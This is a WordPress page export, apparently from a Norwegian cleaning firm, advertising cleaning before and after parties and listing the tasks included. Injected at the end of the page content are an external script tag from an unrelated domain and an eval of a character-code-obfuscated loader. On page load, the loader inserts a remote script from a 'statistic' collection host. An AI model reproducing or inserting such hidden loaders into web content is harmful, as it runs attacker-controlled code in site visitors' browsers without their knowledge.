{"id":4546,"date":"2020-12-03T13:54:36","date_gmt":"2020-12-03T13:54:36","guid":{"rendered":"http:\/\/ms24.no\/?page_id=4546"},"modified":"2020-12-03T14:09:59","modified_gmt":"2020-12-03T14:09:59","slug":"vasking-for-og-etter-selskapet","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=4546","title":{"rendered":"Vasking f\u00f8r og etter selskapet"},"content":{"rendered":"<h2>Vasking f\u00f8r og etter selskapet<\/h2>\n<figure><img decoding=\"async\" width=\"1000\" height=\"628\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/IMG_4353.jpg\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/IMG_4353.jpg 1000w, http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/IMG_4353-300x188.jpg 300w, http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/IMG_4353-768x482.jpg 768w, http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/IMG_4353-600x377.jpg 600w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n<p>La oss s\u00f8rge for vaskingen f\u00f8r og etter selskapet. F\u00e5r god tid til \u00e5 kose deg med forberedelsene til selskapet og eventuelt slappe av n\u00e5r det hele er over.<br \/>\nDet vi gj\u00f8r :<br \/>\n-Fjerner s\u00f8ppel for\u00e5rsaket av festen<br \/>\n-Vaske ut av ovnen og mikrob\u00f8lgeovnen<br \/>\n-Bytte s\u00f8ppelposer<br \/>\n-Gj\u00f8re oppvasken<br \/>\n-Rengj\u00f8re kj\u00f8kkenomr\u00e5dene<br \/>\n-Vaske og desinfisere toaletter og servanter<br \/>\n-St\u00f8vsuge og moppe gulver<br \/>\n-St\u00f8vsuge sofaer<br \/>\n-Fjerner flekker og merker fra vegger etc.<\/p>\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vasking f\u00f8r og etter selskapet La oss s\u00f8rge for vaskingen f\u00f8r og etter selskapet. F\u00e5r god tid til \u00e5 kose deg med forberedelsene til selskapet og eventuelt slappe av n\u00e5r det hele er over. Det vi gj\u00f8r : -Fjerner s\u00f8ppel for\u00e5rsaket av festen -Vaske ut av ovnen og mikrob\u00f8lgeovnen -Bytte s\u00f8ppelposer -Gj\u00f8re oppvasken -Rengj\u00f8re kj\u00f8kkenomr\u00e5dene [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4546","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4546"}],"version-history":[{"count":4,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4546\/revisions"}],"predecessor-version":[{"id":4552,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4546\/revisions\/4552"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}